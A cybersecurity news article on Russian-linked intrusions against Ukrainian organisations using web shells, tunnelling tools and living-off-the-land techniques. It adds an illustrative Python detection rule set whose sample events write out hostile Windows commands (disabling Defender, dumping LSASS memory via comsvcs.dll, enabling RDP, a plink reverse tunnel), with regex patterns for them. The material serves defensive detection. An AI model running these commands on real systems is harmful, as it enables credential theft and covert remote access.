A new report reveals that Russian-linked threat actors have been mounting covert campaigns against Ukrainian entities, including a large business services firm and a local government body, using minimal malware while relying heavily on built-in Windows tools and dual-use software.

The attackers gained an initial foothold by dropping web shells, among them a variant named "LocalOlive" that has been linked to a sub-group of the Russian "Sandworm" operation. The web shells were then used to deliver follow-on tooling such as Chisel, plink and rsockstun, all publicly available tunnelling or remote-access utilities rather than bespoke malware.
Once inside, they ran commands to disable security scans, created scheduled tasks that periodically dumped memory (a common route to harvesting credentials), enumerated logged-on user sessions, installed OpenSSH, opened remote desktop ports and otherwise relied on "living-off-the-land" techniques, using tools already present on the host so as to leave as few traces as possible.
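Because almost every step above is a legitimate administrative command, the practical detection question is whether those commands appear together on one host under one account. The following is an added example, not code from the report or from the vendor that published it: a small rule set run over a handful of constructed Windows Security event records (4688 process creation with command-line auditing, 4698 scheduled task creation). The event records, rule names, host names and the "three distinct behaviours" threshold are all assumptions made for illustration.

```python
import re

# Constructed sample events, not taken from the report. For 4698 (task created)
# the task's <Command>/<Arguments> are assumed to have already been extracted
# from the event XML into the "cmd" field.
SAMPLE_EVENTS = [
    {"id": 4688, "host": "srv01", "user": "svc_web",
     "cmd": r'powershell.exe -nop -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"id": 4698, "host": "srv01", "user": "svc_web",
     "cmd": r'rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 672 C:\Windows\Temp\d.dmp full'},
    {"id": 4688, "host": "srv01", "user": "svc_web",
     "cmd": r'cmd.exe /c quser'},
    {"id": 4688, "host": "srv01", "user": "svc_web",
     "cmd": r'powershell.exe Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0'},
    {"id": 4688, "host": "srv01", "user": "svc_web",
     "cmd": r'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389'},
    {"id": 4688, "host": "srv01", "user": "svc_web",
     "cmd": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    # Benign admin activity on another host: should not match any rule.
    {"id": 4688, "host": "ws07", "user": "admin",
     "cmd": r'schtasks /query /fo list'},
    # A lone tunnelling tool on ws07: one hit, below the correlation threshold.
    {"id": 4688, "host": "ws07", "user": "admin",
     "cmd": r'C:\Windows\Temp\plink.exe -N -R 0.0.0.0:4444:127.0.0.1:3389 -P 22 user@203.0.113.5'},
]

# Each rule: (tag, event IDs it applies to, regex over the command line).
# Tags are illustrative names, not a vendor taxonomy.
RULES = [
    ("defender_tamper", {4688},
     re.compile(r"(?:Set|Add)-MpPreference\s+-(?:Disable\w+|Exclusion\w+)", re.I)),
    ("memory_dump_task", {4688, 4698},
     re.compile(r"(?:procdump|comsvcs\.dll,?\s*MiniDump)", re.I)),
    ("session_enum", {4688},
     re.compile(r"\b(?:quser|qwinsta|query\s+(?:user|session))\b", re.I)),
    ("openssh_install", {4688},
     re.compile(r"Add-WindowsCapability.*OpenSSH\.Server|\bsshd\b", re.I)),
    ("rdp_enable", {4688},
     re.compile(r"fDenyTSConnections.*\b0\b|localport=3389", re.I)),
    ("tunnel_tool", {4688},
     re.compile(r"\b(?:chisel|plink(?:\.exe)?|rsockstun)\b", re.I)),
]

# A host showing this many distinct behaviours is escalated (assumed threshold).
THRESHOLD = 3


def scan_events(events):
    """Return (host, user, tag) for every rule that fires on an event."""
    findings = []
    for ev in events:
        for tag, ids, rx in RULES:
            if ev["id"] in ids and rx.search(ev["cmd"]):
                findings.append((ev["host"], ev["user"], tag))
    return findings


def triage(events, threshold=THRESHOLD):
    """Group hits per host; flag hosts with >= threshold distinct behaviours.

    Any single hit may be legitimate administration; the combination of
    scan disabling, memory dumping, session enumeration and opening a remote
    access path on the same host is what warrants an incident.
    """
    by_host = {}
    for host, _user, tag in scan_events(events):
        by_host.setdefault(host, set()).add(tag)
    by_host = {h: sorted(tags) for h, tags in by_host.items()}
    flagged = sorted(h for h, tags in by_host.items() if len(tags) >= threshold)
    return {"by_host": by_host, "flagged": flagged}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for host, tags in result["by_host"].items():
        print(f"{host}: {', '.join(tags)}")
    print("flagged hosts:", result["flagged"])
```

In a real deployment the regexes would run against the SIEM's normalised command-line field, and the correlation window (here the whole sample) would be bounded in time; the point of the example is that none of the individual commands is malware, so correlation across behaviours, not signature matching, is what surfaces the intrusion.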
The overarching implication is that highly skilled adversaries can carry out deep reconnaissance and credential theft while keeping a very small footprint, which makes detection and mitigation all the more challenging: because the activity consists largely of legitimate administrative commands, defenders have to examine command lines, scheduled task creation and configuration changes in context rather than rely on malware detection alone.
© 2025, Lyonsdown Limited. teiss® is a registered trademark of Lyonsdown Ltd. VAT registration number: 830519543